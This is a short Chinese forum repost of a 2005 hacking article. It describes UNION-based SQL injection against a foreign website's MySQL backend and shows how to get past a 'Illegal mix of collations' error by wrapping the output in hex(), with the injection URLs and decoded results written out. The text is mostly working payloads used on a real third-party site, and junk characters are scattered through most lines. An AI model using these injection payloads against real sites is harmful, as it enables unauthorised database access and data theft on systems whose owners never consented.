本文作者:SuperHei
+ i0 ~, G8 i* O/ j: D8 d/ d4 B文章性质:原创
2 B. n, g, m; `3 a8 b发布日期:2005-10-18
3 x3 W4 l D' E2 w8 f+ }测试个国外的站时:% ]4 P' O2 U# T3 |; w/ m# d
url:?c_id=2%20and%201=2%20union%20select%201,version(),3,4,5,6%20/*
7 t. s$ x+ k$ [5 E/ P( t. k返回错误:" R2 Q# E& r! t# s ^; x
Illegal mix of collations (euckr_korean_ci,IMPLICIT) and (utf8_general_ci,IMPLICIT) for operation 'UNION'
) K) [6 h. V1 i, r5 gMySQL Error No. 126, H/ f- a5 |" t% w/ @/ U
看来是union查询前后字符集(http://dev.mysql.com/doc/mysql/en/Charset-collation-charset.html)不同出现的。8 R3 h' t' t8 D4 y8 P. I3 X, @8 y
解决办法:转为其他编码如hex。2 d$ {# b) W& l" ^$ b7 B- G
url:?c_id=2%20and%201=2%20union%20select%201,hex(version()),3,4,5,6%20/*
% K( ], s* f! Y2 S. R+ V成功得到hex(version())的值为:
, B5 a% g8 h; L5 k; W342E312E332D626574610 `: F; p2 c: L' Z# A
回Mysql查询下得到:
8 K" ^ S5 X$ x, [! o* Ymysql> select 0x342E312E332D62657461;
' |* |# J: K3 \/ B; @+------------------------+9 n( _7 r# B+ K ~
| 0x342E312E332D62657461 |" i. W4 j* C! I A; J1 b$ Y- m/ i% t
+------------------------+& z( J9 \) R m7 Z
| 4.1.3-beta |+ i. F4 F# m# _/ d& d2 E: h4 H
+------------------------+! Q$ \. _, `) b- }6 R; y
1 row in set (0.00 sec)7 \* e2 b8 D* H h; M7 x
7 ]0 W8 f6 y1 e5 Q5 k8 i t |
发表于 2012-9-15 14:04:54
收藏
支持
反对